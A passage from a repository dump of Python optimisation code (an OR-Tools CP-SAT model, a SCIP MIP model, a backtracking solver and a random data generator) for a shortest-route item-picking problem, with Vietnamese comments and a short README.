<= total[i])\n\n#objective\nf = model.NewIntVar(0,maxd,'f')\nmodel.Add(f>=sum(x[i,j]*d[i%(M+1)][j%(M+1)] for i in range(M+2) for j in range(M+2) if i!=j))\n\n\n#khoi tao solver\nmodel.Minimize(f)\nsolver = cp_model.CpSolver()\nstatus = solver.Solve(model)\n\nrs = np.array([[0 for i in range(M+2)] for j in range(M+2)])\n\nif status == cp_model.OPTIMAL:\n 
print('Obj = %i' % solver.ObjectiveValue())\n\n for i in range(M+2):\n \tfor j in range(M+2):\n \t\tif i!=j:\n \t\t\trs[i][j] = solver.Value(x[i,j])\n# tim kiem lai duong di toi uu\ndef trace(M, rs):\n tmp = 0\n trace = [0]\n while True:\n for i in range(M+2):\n if i != tmp and rs[tmp,i] > 0:\n tmp = i\n break\n if tmp == M+1:\n break\n trace.append(tmp)\n \n return trace\n\n\nprint('trace: ',trace(M,rs))\nt = time.time() - t1\nprint('time: %.2f'%t)\n" }, { "alpha_fraction": 0.37042924761772156, "alphanum_fraction": 0.4062003195285797, "avg_line_length": 27.56818199157715, "blob_id": "f094ab73e94dc1bc9802fa4905b68f8143a585b6", "content_id": "1ea1ce6a852413e7a293c51c0a01c45dcf64dc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/gen.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import random as rd\n\ndef genData(fileName, N, M):\n with open(fileName, \"w\") as f:\n f.write(str(N) + \" \" + str(M) + \"\\n\")\n\n x = [0 for i in range(N)] # x[i]: total of all items i\n # Generate matrix Q: Q(i,j) is number of item i on table j\n\n for i in range(N):\n s = \"\"\n for j in range(M):\n c = rd.randint(1,15)\n x[i] = x[i] + c\n s = s + str(c) + ' '\n s = s + '\\n'\n f.write(s)\n\n # Generate matrix d: d(i,j) is distance between 2 point i and j\n d = [[0 for i in range(M+1)] for j in range(M+1)]\n \n for i in range(M+1):\n for j in range(i, M+1):\n if i != j:\n d[i][j] = d[j][i] = rd.randint(1, 15)\n \n for i in range(M+1):\n s = ''\n for j in range(M+1):\n s = s + str(d[i][j]) + ' '\n f.write(s + '\\n')\n \n\n # Generate a order include q(i): is number of item i, i = 1...N\n q = ''\n for i in range(N):\n c = rd.randint(1, x[i])\n q = q + str(c) + ' '\n f.write(q)\n f.close()\n\ngenData('test_5000_1000.txt',5000,1000)\n\n# genData('test_150_100.txt',150,100)\n\n" }, { "alpha_fraction": 0.5328732132911682, "alphanum_fraction": 0.5553941130638123, "avg_line_length": 26.23762321472168, "blob_id": "4c013a1148c9c051a70a260ede943d8ad1cfe48a", "content_id": "31b2b98acf56f711b796c92a8104f0de8d6d46d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2753, "license_type": "no_license", "max_line_length": 67, "num_lines": 101, "path": "/Project-optimal-CP.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.sat.python import cp_model\n\n#input\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nt1 = time.time()\nN,M,Q,d,q = input('test_30_10.txt')\n# xu ly du lieu\n# maxd la tong tat ca cac canh cua do thi duong di\nmaxd = 0\nfor i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n# total[i] la tong so luong cua moi mat hang i\ntotal = [0 for i in range(N)]\nfor i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n#model\n# variable\nmodel = cp_model.CpModel()\n# diem tiep theo cua hanh trinh tu i\nx = [model.NewIntVar(1,M+1,'x['+str(i)+']') for i in range(0,M+1)]\n# neu ke i duoc i duoc 
den thi y[i] =1 va nguoc lai\ny = [model.NewIntVar(0,1,'y['+str(i)+']') for i in range(0,M+2)]\n# tong quang duong tu 0 den diem i\nz = [model.NewIntVar(0,maxd,'z['+str(i)+']') for i in range(0,M+2)]\n\n#constraint\n#khoi tao gia bien\nmodel.Add(y[0]==1)\nmodel.Add(y[M+1]==1)\nmodel.Add(z[0]==0)\n#constraint 1\nfor i in range(M+1):\n\tmodel.Add(x[i]!=i)\n#constraint 2\nmodel.AddAllDifferent(x)\n#constraint 3\nfor i in range(M+1):\n for j in range(1,M+2):\n # x[i] = j => y[i] +y[j] =2\n b= model.NewBoolVar('b')\n model.Add(x[i]==j).OnlyEnforceIf(b)\n model.Add(x[i]!=j).OnlyEnforceIf(b.Not())\n model.Add(y[i]+y[j]==2).OnlyEnforceIf(b)\n#constraint 4\nfor i in range(M+1):\n for j in range(1,M+2):\n b= model.NewBoolVar('b')\n model.Add(x[i]==j).OnlyEnforceIf(b)\n model.Add(x[i]!=j).OnlyEnforceIf(b.Not())\n model.Add(z[i]+d[i%(M+1)][j%(M+1)]==z[j]).OnlyEnforceIf(b)\n#constraint 5\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) >= q[i])\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) <= total[i])\n\n#khoi tao solver\nmodel.Minimize(z[M+1])\nsolver = cp_model.CpSolver()\nstatus = solver.Solve(model)\n\nrs = [-1 for i in range(M+1)]\n\nif status == cp_model.OPTIMAL:\n print('Obj = %i' % solver.ObjectiveValue())\n for i in range(M+1):\n rs[i] = solver.Value(x[i])\n# tim kiem lai duong di toi uu\ndef trace(M,rs):\n trace = []\n tmp = 0\n while tmp != M+1:\n trace.append(tmp)\n tmp = rs[tmp]\n return trace\n\nprint('trace: ',trace(M,rs))\nt = time.time() - t1\nprint('time: %.2f'%t)\n\n\n" }, { "alpha_fraction": 0.46463021636009216, "alphanum_fraction": 0.4914255142211914, "avg_line_length": 26.31219482421875, "blob_id": "9057b58c312ce1a0e7327fa5b589960e54e31dc4", "content_id": "1adb5fa62a9b2649abd920afb1e2737848e39021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5598, "license_type": "no_license", "max_line_length": 85, "num_lines": 205, "path": "/ver2-mip.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.linear_solver import pywraplp\nimport numpy as np\n\n# Read data\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nC = 1000\n\ndef CreateSolverAndVariables(M, maxd):\n solver = pywraplp.Solver.CreateSolver('SCIP')\n\n x = {}\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n x[i, j] = solver.IntVar(0, 1, 'x('+str(i) +', '+str(j)+')')\n\n y = [solver.IntVar(0, 1, 'y('+str(i)+')') for i in range(M+2)]\n z = [solver.IntVar(0, maxd, 'z('+str(i)+')') for i in range(M+2)] # 0' === M+1\n return x, y, z, solver\n\n# Constraint 1: Default Constraints\ndef CreateConstraint1(solver, M, x, y, z):\n # y[0] = 1\n c = solver.Constraint(1,1)\n c.SetCoefficient(y[0],1)\n\n # y[M+1] = 1\n c = solver.Constraint(1,1)\n c.SetCoefficient(y[M+1],1)\n\n # tai diem M+1, luon co 1 luong di vao\n c = solver.Constraint(1,1)\n for i in range(1,M+1):\n c.SetCoefficient(x[i, M+1],1)\n\n # Tai diem 0, luon co 1 luong di ra\n c = solver.Constraint(1,1)\n for i in range(1,M+1):\n c.SetCoefficient(x[0,i],1)\n \n c = solver.Constraint(0,0)\n c.SetCoefficient(z[0],1)\n\n# 
Constraint 2\n# x[i,j] = 1 -> y[i] + y[j] = 2\ndef CreateConstraint2(solver, M, x, y):\n for i in range(1,M+1):\n for j in range(1,M+1):\n if i != j:\n solver.Add(y[i]+y[j] + C*(1-x[i,j]) >= 2)\n solver.Add(y[i]+y[j] + C*(x[i,j]-1) <= 2)\n\n# Constraint 3 and 4\ndef CreateConstraint3and4(solver, M, x, y):\n # y[i] = 1 --> sum(x[i,j]) (j=1->M+1) = sum(x[j,i]) (j=0->M) = 1 voi moi i =1..M\n for i in range(1,M+1):\n c = solver.Constraint(1-C, C)\n c.SetCoefficient(y[i], -C)\n for j in range(1,M+2):\n if i != j:\n c.SetCoefficient(x[i,j], 1)\n \n c = solver.Constraint(-C,1+C)\n c.SetCoefficient(y[i], C)\n for j in range(1,M+2):\n if i != j:\n c.SetCoefficient(x[i,j], 1)\n\n c = solver.Constraint(1-C, C)\n c.SetCoefficient(y[i], -C)\n for j in range(M+1):\n if i != j:\n c.SetCoefficient(x[j,i], 1)\n \n c = solver.Constraint(-C,1+C)\n c.SetCoefficient(y[i], C)\n for j in range(M+1):\n if i != j:\n c.SetCoefficient(x[j,i], 1)\n\n# Constraint 5\n# x[i,j] = 1 -> z[j] = z[i] + d[i,j]\ndef CreateConstraint5(solver,M,x,z,d):\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n solver.Add(z[j] + C*(1-x[i,j]) >= z[i]+d[i%(M+1)][j%(M+1)])\n solver.Add(z[j] + C*(x[i,j]-1) <= z[i]+ d[i%(M+1)][j%(M+1)])\n\n\n# Constraint 6: quantity constraints\ndef CreateConstraint6(solver, M, N, y, q, Q, total):\n for i in range(N):\n c = solver.Constraint(q[i], total[i])\n for j in range(1,M+1):\n c.SetCoefficient(y[j%(M+1)], Q[i][j%(M+1)])\n\n\ndef CreateObjective(solver, M, x, d):\n obj = solver.Objective()\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n obj.SetCoefficient(x[i,j], d[i%(M+1)][j%(M+1)])\n \n obj.SetMinimization()\n\ndef Trace(M, rs):\n tmp = 0\n trace = [0]\n while True:\n for i in range(M+2):\n if i != tmp and rs[tmp,i] > 0:\n tmp = i\n break\n if tmp == M+1:\n break\n trace.append(tmp)\n \n return trace\n\ndef ComputeItems(M, N, Q, y):\n rs = [0 for i in range(N)]\n for i in range(N):\n for j in range(M+1):\n if y[j].solution_value() > 0:\n rs[i] = rs[i] + Q[i][j]\n return rs\n\ndef PrintSol(M, rs):\n trace = Trace(M, rs)\n print(\"Route:\", trace)\n\n\ndef Solve(M, N, q, Q, d, total, maxd):\n x, y, z, solver = CreateSolverAndVariables(M, maxd)\n CreateConstraint1(solver, M, x, y, z)\n CreateConstraint2(solver, M, x, y)\n CreateConstraint3and4(solver, M, x, y)\n CreateConstraint5(solver, M, x, z, d)\n CreateConstraint6(solver, M, N, y, q, Q, total)\n CreateObjective(solver, M, x, d)\n\n result_status = solver.Solve()\n\n # The problem has optimal solution.\n assert result_status == pywraplp.Solver.OPTIMAL\n print('Objective =', solver.Objective().Value())\n\n rs = np.array([[0 for i in range(M+2)] for j in range(M+2)])\n for i in range(M+2):\n for j in range(M+2):\n if i != j:\n rs[i, j] = x[i,j].solution_value()\n \n # print z[i]\n # for i in range(M+2):\n # print('z['+str(i)+'] =', z[i].solution_value())\n\n return rs\n\ndef main():\n t1 = time.time()\n N, M, Q, d, q = input('test_100_80.txt')\n total = [0 for i in range(N)]\n for i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n\n maxd = 0\n for i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n rs = Solve(M, N, q, Q, d, total, maxd)\n PrintSol(M,rs)\n\n # print('Order:', q)\n # print('So luong:', ComputeItems(M, N, Q, y))\n t2 = time.time()\n \n print('Time:',round(t2-t1, 2), 'seconds')\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.43293794989585876, "alphanum_fraction": 0.450273722410202, "avg_line_length": 25.409639358520508, "blob_id": 
"951c4a7bcff5d274aa38c30ed5a7bec01bc997dc", "content_id": "081e7c1ac64c79091136dd7a4b22780dfca960d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2192, "license_type": "no_license", "max_line_length": 80, "num_lines": 83, "path": "/ver1-backtracking.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "\nimport time\n\n# Read data\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\ndef check(v):\n if not visited[v]:\n for i in range(N):\n if q[i] > 0 and Q[i][v] > 0:\n return True\n return False\n\ndef checkStop():\n for i in range(N):\n if q[i] != 0:\n return False\n return True\n\ndef solution(k):\n global idx\n global minDistance\n if minDistance > curDistance + d[x[k]][0]:\n minDistance = curDistance + d[x[k]][0]\n idx = k+1\n rs[:k+1] = x[:k+1]\n\ndef TRY(k):\n global q, curDistance\n for v in range(1, M+1):\n if check(v):\n x[k] = v\n\n # Update\n curDistance = curDistance + d[x[k-1]][x[k]]\n visited[v] = True\n r = [0 for i in range(N)] # r[i]: la so luong san pham i lay o ban v\n for i in range(N):\n r[i] = min(Q[i][v], q[i])\n q[i] = q[i] - r[i]\n \n if checkStop():\n solution(k)\n if curDistance < minDistance:\n TRY(k+1)\n\n # Recover\n curDistance = curDistance - d[x[k-1]][x[k]]\n visited[v] = False\n for i in range(N):\n q[i] = q[i] + r[i]\n\n\nt1 = time.time()\nN, M, Q, d, q = input('test_30_15.txt')\nx = [0 for i in range(M+1)] # x[i]: i-th destination\nvisited = [False for i in range(M+1)] # visited[i] = True if went to i\ncurDistance = 0 \nminDistance = 1e9\nrs = [0 for i in range(M+1)] # result\nidx = 0\nTRY(1)\nprint(\"Objective:\", minDistance)\nprint(\"Route:\", rs[:idx])\nt2 = time.time()\nprint('Time:',t2-t1, 'seconds')" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.666666984558105, "blob_id": "8972d102e1b7d83e4952ed527ecb0694e20b21ba", "content_id": "bb2be360950b6e4bf0676c008cc1d4913a36b1d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 34, "num_lines": 12, "path": "/README.md", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "# `Generate data input`\n\n- gen.py\n\n\n# `Version 1`: Back tracking\n\n- ver1-backtracking.py\n\n# `Version 2`: Mix Integer Program\n\n- ver2-mip.py\n\n" } ]
6
pavlicic1marko/Python_for_web
https://github.com/pavlicic1marko/Python_for_web
8f29bc8c4bdcb47859151e8a4fa1d57490ed2b3c
e5a4f08de456ddf14803c92adde671bce81870e9
16ffe9f0c82ef851102dceb25c89645277b37c1f
refs/heads/master
2020-03-28T09:25:33.477668
2019-01-08T21:02:09
2019-01-08T21:02:09
148,035,835
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6146666407585144, "alphanum_fraction": 0.624666690826416, "avg_line_length": 20.35714340209961, "blob_id": "7a9bcf288f570087ad361a6d7ae842763e204600", "content_id": "7406b9389a08d51542370896e95296253425740f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1500, "license_type": "no_license", "max_line_length": 68, "num_lines": 70, "path": "/SQLite_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import sqlite3\n\nconn = sqlite3.connect('music.sqlite')\ncur = conn.cursor()\n\ncur.execute('DROP TABLE IF EXISTS Tracks')\ncur.execute('CREATE TABLE Tracks (title TEXT, plays INTEGER)')\n\nconn.close()\n\n\n\n\n\nimport sqlite3\n\nconn = sqlite3.connect('music.sqlite')\ncur = conn.cursor()\n\ncur.execute('INSERT INTO Tracks (title, plays) VALUES (?, ?)', \n ('Thunderstruck', 20))\ncur.execute('INSERT INTO Tracks (title, plays) VALUES (?, ?)', \n ('My Way', 15))\nconn.commit()\n\nprint('Tracks:')\ncur.execute('SELECT title, plays FROM Tracks')\nfor row in cur:\n print(row)\n\ncur.execute('DELETE FROM Tracks WHERE plays < 100')\n\ncur.close()\n\n\n\n\n\n\n\ncur.execute('''INSERT OR IGNORE INTO Artist (name) \n VALUES ( ? )''', ( artist, ) )\n cur.execute('SELECT id FROM Artist WHERE name = ? ', (artist, ))\n artist_id = cur.fetchone()[0]\n\n cur.execute('''INSERT OR IGNORE INTO Album (title, artist_id) \n VALUES ( ?, ? )''', ( album, artist_id ) )\n cur.execute('SELECT id FROM Album WHERE title = ? ', (album, ))\n album_id = cur.fetchone()[0]\n\n cur.execute('''INSERT OR REPLACE INTO Track\n (title, album_id, len, rating, count) \n VALUES ( ?, ?, ?, ?, ? )''', \n ( name, album_id, length, rating, count ) )\n\n conn.commit()\n\n\nimport sqlite3\n\nconn = sqlite3.connect('my_db.sqlite')\ncur = conn.cursor()\n\ncur.executescript('''\nDROP TABLE IF EXISTS User;\n\nCREATE TABLE User (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT UNIQUE);\n''')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6318234801292419, "alphanum_fraction": 0.6440185904502869, "avg_line_length": 29.210525512695312, "blob_id": "43396b602b0b990b76d87aef14b3cdb92e5d3f09", "content_id": "af51630661af4479366ecb79aee10b9249241801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1722, "license_type": "no_license", "max_line_length": 82, "num_lines": 57, "path": "/Download_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import urllib.request\nurllib.request.urlretrieve(\"https://grad.ucla.edu/asis/agep/advcv.pdf\",\"new.pdf\")\n\nimport urllib.request, urllib.parse, urllib.error\nimg = urllib.request.urlopen('https://viphouse.rs/products/27031/6360.jpg').read()\nfhand = open('6360.jpg', 'wb')\nfhand.write(img)\nfhand.close()\n\nimport requests\nfrom b4 import BeautifulSoup\ndef trade_spider(max_pages):\n page = 1\n while page <= max_pages:\n url = 'https://buckysroom.org/trade/search.php?page=' + str(page)\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for link in soup.findAll('a', {'class': 'item-name'}):\n href = \"https://buckysroom.org\" + link.get('href')\n title = link.string\n print(href)\n print(title)\n page += 1 \ntrade_spider(1)\n\nimport requests\nfrom b4 import BeautifulSoup\n\n\ndef trade_spider(max_pages):\n page = 1\n while page <= max_pages:\n url = 'https://buckysroom.org/trade/search.php?page=' + str(page)\n 
source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for link in soup.findAll('a', {'class': 'item-name'}):\n href = \"https://buckysroom.org\" + link.get('href')\n title = link.string\n # print(href)\n # print(title)\n get_single_item_data(href)\n page += 1\n \n\ndef get_single_item_data(item_url):\n source_code = requests.get(item_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n for item_name in soup.findAll('div', {'class': 'i-name'}):\n print(item_name.string)\n for link in soup.findAll('a'):\n href = \"https://buckysroom.org\" + link.get('href')\n print(href)\n\ntrade_spider(3)\n" }, { "alpha_fraction": 0.6393939256668091, "alphanum_fraction": 0.6393939256668091, "avg_line_length": 35.44444274902344, "blob_id": "52dcd2d61ed53c9630e2baa01c80173b8e6de42f", "content_id": "9741e6caa58ad84bb61347990ecd7a3716a227ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 330, "license_type": "no_license", "max_line_length": 81, "num_lines": 9, "path": "/RE_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import re\ntext = open(\"re.txt\")\nfor line in text:\n line = line.rstrip()\n if re.search('ovo je bitno', line): # if this string is present, returns True\n print(line)\n if re.search('^ovo je bitno', line): # if the line starts with it\n print(line)\n print( re.findall('[gG]', line)) # returns a list, empty or with a few elements\n\n\n" }, { "alpha_fraction": 0.744911789894104, "alphanum_fraction": 0.75780189037323, "avg_line_length": 25.799999237060547, "blob_id": "117bf99afc7f4a8b8b4665af2d8282c8e2190418", "content_id": "a0acc052462dc6828c7cd855853ace796844694a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1474, "license_type": "no_license", "max_line_length": 112, "num_lines": 55, "path": "/Selenium_Python_introduction.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "__author__=\"ME\"\nimport time\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"G:\\\\chromedriver_win32\\\\chromedriver.exe\") # location of the file\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://www.youtestme.com/\")\ndriver.implicitly_wait(20)\ntime.sleep(3)\ndriver.get_screenshot_as_file(\"youtestme.png\")\ntime.sleep(3)\ndriver.quit()\n\n\n__author__=\"ME\"\nimport time\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"D:\\\\chromedriver.exe\") # location of the file\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://google.com\")\ndriver.find_element_by_name(\"q\").send_keys(\"Automation\") # q is the value of the name attribute of the search bar\ntime.sleep(4)\ndriver.find_element_by_name(\"btnK\").click()\ntime.sleep(4)\ndriver.quit()\n\n\n\n__author__=\"ME\"\nimport time\nimport re\nfrom selenium import webdriver\ndriver=webdriver.Chrome(\"D:\\\\chromedriver.exe\") # location of the file\ndriver.set_page_load_timeout(30)\ndriver.get(\"https://google.com\")\ndoc=driver.page_source\nprint(doc)\n\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\ndriver=webdriver.Chrome(\"G:\\\\chromedriver_win32\\\\chromedriver.exe\") # location of the file\ndriver.set_page_load_timeout(30)\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nprint(elem)\nelem.clear()\nprint(elem)\nelem.send_keys(\"pycon\")\nprint(elem)\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\nprint(elem)\ndriver.close()\n" }, { "alpha_fraction": 0.7074829936027527, "alphanum_fraction": 0.7307171821594238, "avg_line_length": 45.772727966308594, "blob_id": "3eeaf3cd6bec19f55954aa1384b4091cb8de5a0d", "content_id": "e57b4259c525147aa3ab50c12cf870f9fc305e63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 141, "num_lines": 22, "path": "/Download_single_stock.py", "repo_name": "pavlicic1marko/Python_for_web", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.core.common.is_list_like= pd.api.types.is_list_like\nimport pandas_datareader.data as web\nimport datetime\n\nstock1=input(\"enter stock1 symbol(example: AMZN)\") #user input\ntime1=[int(x) for x in input(\"maximum interval for analysis is six months, enter the start time: year month date(example: 2008 6 1)\",).split()]\ntime2=[int(x) for x in input(\"enter the end time: year month date(example: 2009 3 31)\",).split()]\nstart_date=datetime.datetime(*time1)\nend_date=datetime.datetime(*time2)\n\ndef get_price_history(stock_symbol,start_date,end_date):\n dff = web.DataReader(stock_symbol, 'quandl', start_date, end_date) #use quandl, yahoo and google do not work\n dff.reset_index(inplace=True)\n dff.set_index(\"Date\", inplace=True)\n dff[\"of_first_value\"]=dff[\"AdjClose\"]/dff.iloc[-1][\"AdjClose\"]*100 #add a column\n return dff\n\ndf=get_price_history(stock1,start_date,end_date)\ntable_name=stock1\nconn ='sqlite:///full_stock_data2.db'#database name\ndf.to_sql(table_name, conn, if_exists='append', index=True)\n" } ]
5
0xJinbe/Exercicios-py
https://github.com/0xJinbe/Exercicios-py
4836567117ddbde1190ca4a4cd7cd7450eb6d2d5
a374488f0a44413e5480f7dfce3e34639e2ade6a
d2bfa555da6f82e7bf8506eb7b8cacbd2014ce6b
refs/heads/master
2023-06-29T21:56:26.906499
2021-08-04T16:32:59
2021-08-04T16:32:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6770538091659546, "alphanum_fraction": 0.7327667474746704, "avg_line_length": 36.85714340209961, "blob_id": "5c159a67590cdad21fe64ac1b7b3bd74fa6bd74e", "content_id": "8616106226a9bd06ed3a029a95118ae21a3dc6db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1077, "license_type": "no_license", "max_line_length": 159, "num_lines": 28, "path": "/Ex 016.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contraram para desenvolver o programa que calculará os reajustes.\nFaça um programa que recebe o salário de um colaborador e o reajuste segundo o seguinte critério, baseado no salário atual:\nsalários até R$ 280,00 (incluindo) : aumento de 20%\nsalários entre R$ 280,00 e R$ 700,00 : aumento de 15%\nsalários entre R$ 700,00 e R$ 1500,00 : aumento de 10%\nsalários de R$ 1500,00 em diante : aumento de 5% Após o aumento ser realizado, informe na tela:\no salário antes do reajuste;\no percentual de aumento aplicado;\no valor do aumento;\no novo salário, após o aumento.\"\"\"\n\nsalario = float(input('Salário: '))\n\nif salario <= 280:\n percentual = 20\nelif salario <= 700:\n percentual = 15\nelif salario <= 1500:\n percentual = 10\nelse:\n percentual = 5\n\nprint('Salario original: ', salario, 'Percentual: ', percentual)\n\nvalor_aumento = (salario * percentual) / 100\nnovo_sal = valor_aumento + salario\n\nprint('Valor aumento: ', valor_aumento, 'Novo salario: ', novo_sal)" }, { "alpha_fraction": 0.6620278358459473, "alphanum_fraction": 0.6779323816299438, "avg_line_length": 27, "blob_id": "302ec5fa44331c4940ea1d88177c23c26e8166b0", "content_id": "634e3ced4648f40620210c586f587e4c9e1ae6eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 125, "num_lines": 18, "path": "/Ex 043.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que receba dois números inteiros e gere os números inteiros que estão no intervalo compreendido por eles.\n\"\"\"\n\nn1 = int(input('Escreva n1: '))\nn2 = int(input('Escreva n2: '))\n\nfor i in range(n1, n2, 1):\n print(i)\n\n#Altere o programa anterior para mostrar no final a soma dos números.\n\ninicio = int(input(\"digite o inicio do intervalo-->\"))\nfim = int(input(\"digite o fim do intervalo-->\"))\nlista = []\nfor i in range (inicio, fim, 1):\n lista.append(i)\n s = sum(lista)\nprint(s)" }, { "alpha_fraction": 0.5959780812263489, "alphanum_fraction": 0.6014625430107117, "avg_line_length": 23.952381134033203, "blob_id": "ecd6e8da299d2af310e07c306fea9e9369478cef", "content_id": "ed196fd1b71168dfd8a77240e79b2a01eceb5c47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 74, "num_lines": 21, "path": "/Ex 055.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que calcule o mostre a média aritmética de N notas.\"\"\"\r\n\r\nn = int(input('Digite a quantidade de notas que deseja calcular: '))\r\ncount = 0\r\nl = []\r\n\r\nwhile count < n:\r\n l.append(float(input('Digite o valor da nota: ')))\r\n count += 1\r\n\r\nprint(f\"A média de todas as notas é: {sum(l)/len(l)}\")\r\n\r\n\r\n\"\"\"n = float(input('Entre com as notas a serem calculadas: '))\r\nl = 
[]\r\n\r\nwhile n > 0:\r\n n = float(input('Entre com as notas a serem calculadas: '))\r\n l.append(n)\r\n\r\nprint(f\"A medias das notas é: {sum(l)/len(l)}\")\"\"\"\r\n\r\n" }, { "alpha_fraction": 0.6483957171440125, "alphanum_fraction": 0.6724599003791809, "avg_line_length": 42.117645263671875, "blob_id": "0951bfe3b093002c8d08eea434436ddef7dfc494", "content_id": "85c06ca25b9edd9740e9e7af464491bd03b35372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "no_license", "max_line_length": 248, "num_lines": 17, "path": "/Ex 056.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça para n pessoas a sua idade, ao final o programa devera verificar se a média de idade da turma varia entre 0 e 25,26 e 60 e maior que 60; e então, dizer se a turma é jovem, adulta ou idosa, conforme a média calculada.\"\"\"\r\n\r\nn = int(input('Quantas pessoas participarão da turma? '))\r\ncount = 0\r\nl = []\r\n\r\nwhile count < n:\r\n count += 1\r\n l.append(int(input('Qual a idade a ser calculada? ')))\r\n\r\nmedia = sum(l)/len(l)\r\nif 0 < media and media < 25:\r\n print(f\"A media da turma é {media}. A turma se classifica como JOVEM\")\r\nelif media > 26 and media < 60:\r\n print(f\"A media da turma é {media}. A turma se classifica como ADULTA\")\r\nelse:\r\n print(f\"A media da turma é {media}. A turma se classifica como IDOSA\")" }, { "alpha_fraction": 0.6550324559211731, "alphanum_fraction": 0.673701286315918, "avg_line_length": 34.20000076293945, "blob_id": "e66cd0ddbbb8e4b3c313409459d659e3fe67c053", "content_id": "6f0098f047abd2efa21b3924f107d9a36d47c01d", "detected_licenses": [], 